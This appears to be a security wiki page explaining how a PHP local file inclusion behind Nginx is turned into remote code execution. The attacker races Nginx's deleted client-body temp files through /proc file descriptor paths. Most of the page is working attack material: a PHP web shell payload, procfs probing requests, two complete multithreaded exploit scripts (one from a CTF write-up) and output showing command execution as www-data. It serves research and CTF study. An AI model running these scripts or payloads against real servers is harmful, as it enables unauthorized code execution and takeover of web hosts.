LFI2RCE via Nginx temp files


Vulnerable configuration

  • PHP code:
<?php include_once($_GET['file']);
  • FPM / PHP configuration:
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
  • Setup / hardening:
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
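Even with /tmp, /var/tmp and the PHP session directory locked down as above, the include itself can still be verified against world-readable procfs entries. A minimal sanity check, assuming the vulnerable PHP snippet above is reachable at a hypothetical URL via its file parameter:

import requests

# quick LFI sanity check via procfs (the URL is a placeholder, 'file' matches the PHP snippet above)
URL = 'http://target.example/'
r = requests.get(URL, params={'file': '/proc/self/cmdline'})
print(r.content)   # e.g. b'php-fpm: pool www\x00...' if the include works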

Fortunately, PHP is nowadays frequently deployed via PHP-FPM behind Nginx. Nginx offers an easily overlooked client body buffering feature: whenever a client body (not limited to POST requests) is larger than a certain threshold, it is written to a temporary file.

If Nginx runs as the same user as PHP (commonly www-data), this feature makes it possible to exploit the LFI without being able to create any other file on the system.
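A minimal sketch of that first half, assuming a hypothetical URL: send a request body larger than Nginx's client body buffer (8–16 KB by default) that starts with a PHP payload, so Nginx spools it to a file under its client body temp path (/var/lib/nginx/body in the listing further below):

import requests

# sketch: force nginx to spool a PHP payload into a client body temp file
# (the URL is a placeholder; the real exploit below keeps many such bodies in flight from threads)
URL = 'http://target.example/'
payload = '<?php system($_GET["c"]); /*'     # the trailing /* comments out the padding
body = payload + 'A' * (64 * 1024)           # well above client_body_buffer_size, so it hits disk

for _ in range(64):                          # keep fresh temp files appearing, to be raced later
    requests.get(URL, data=body)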

Relevant Nginx code:

ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
    ngx_fd_t  fd;

    fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
              access ? access : 0600);

    if (fd != -1 && !persistent) {
        (void) unlink((const char *) name);
    }

    return fd;
}

Here one can see that Nginx deletes the temporary file right after opening it. Fortunately, procfs can still be used to obtain a reference to the deleted file by winning a race:

...
/proc/34/fd:
total 0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
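The reason the "(deleted)" entry is still usable: on Linux an unlinked file lives on as long as some process keeps a descriptor open to it, and /proc/<pid>/fd/<n> exposes that descriptor as a path. A small local demo of this behaviour (not part of the original write-up):

import os

# demo: an unlinked file stays readable through procfs while a descriptor is open
fd = os.open('/tmp/demo_body', os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o600)
os.write(fd, b'<?php system($_GET["c"]);')
os.unlink('/tmp/demo_body')                 # same pattern as ngx_open_tempfile()

path = f'/proc/self/fd/{fd}'
print(os.readlink(path))                    # -> /tmp/demo_body (deleted)
with open(path, 'rb') as f:                 # re-opening through procfs still works
    print(f.read())
os.close(fd)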

Note: in this example /proc/34/fd/15 cannot be included directly, because PHP's include function would resolve the path to /var/lib/nginx/body/0000001368 (deleted), which does not exist on the filesystem. Fortunately, this minor restriction can be bypassed with some indirection, e.g. /proc/self/fd/34/../../../34/fd/15, which finally executes the content of the deleted /var/lib/nginx/body/0000001368 file.
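In request form the indirection looks roughly like this (worker PID, fd number and URL are placeholders; the file and c parameters match the vulnerable snippet above and the exploit below):

import requests

# sketch: include the deleted client-body file through the /proc indirection
URL = 'http://target.example/'
pid, fd = 34, 15                                         # nginx worker PID and fd (placeholders)
path = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'     # ends up at /proc/<pid>/fd/<fd>
r = requests.get(URL, params={'file': path, 'c': 'id'})
print(r.text)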

Full exploit

#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r  = requests.get(URL, params={
    'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r  = requests.get(URL, params={
    'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r  = requests.get(URL, params={
        'file': f'/proc/{pid}/cmdline'
    })

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')

for _ in range(16):
    t = threading.Thread(target=uploader)
    t.start()

# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
    global done

    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(4, 32):
            f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
            r  = requests.get(URL, params={
                'file': f,
                'c': f'id'
            })
            if r.text:
                print(f'[!] {f}: {r.text}')
                done = True
                exit()

for pid in nginx_workers:
    a = threading.Thread(target=bruter, args=(pid, ))
    a.start()


$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
[*] nginx worker found: 33
[*] nginx worker found: 34
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 33
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Another exploit

This one is from https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/.

import requests
import threading
import multiprocessing
import random

SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False

def create_requests_session():
    session = requests.Session()
    # Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
    session.mount('http://', adapter)
    return session

def get_nginx_pids(requests_session):
    if USE_NGINX_PIDS_CACHE:
        return NGINX_PIDS_CACHE
    nginx_pids = set()
    # Scan up to PID 200
    for i in range(1, 200):
        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
        if cmdline.startswith("nginx: worker process"):
            nginx_pids.add(i)
    return nginx_pids

def send_payload(requests_session, body_size=1024000):
    try:
        # The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
        payload = '<?php system("/readflag"); ?> //'
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass

def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)

def send_payload_multiprocess(requests_session):
    # Use all CPUs to send the payload as request body for Nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()

def generate_random_path_prefix(nginx_pids):
    # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # Flags are formatted as hxp{<flag>}
        if "hxp" in d:
            print("Found flag! ")
            print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
    for fd in range(10, 45):
        thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
        thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()

if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)

Labs

References

  • https://bierbaumer.net/security/php-lfi-with-nginx-assistance/
  • https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/
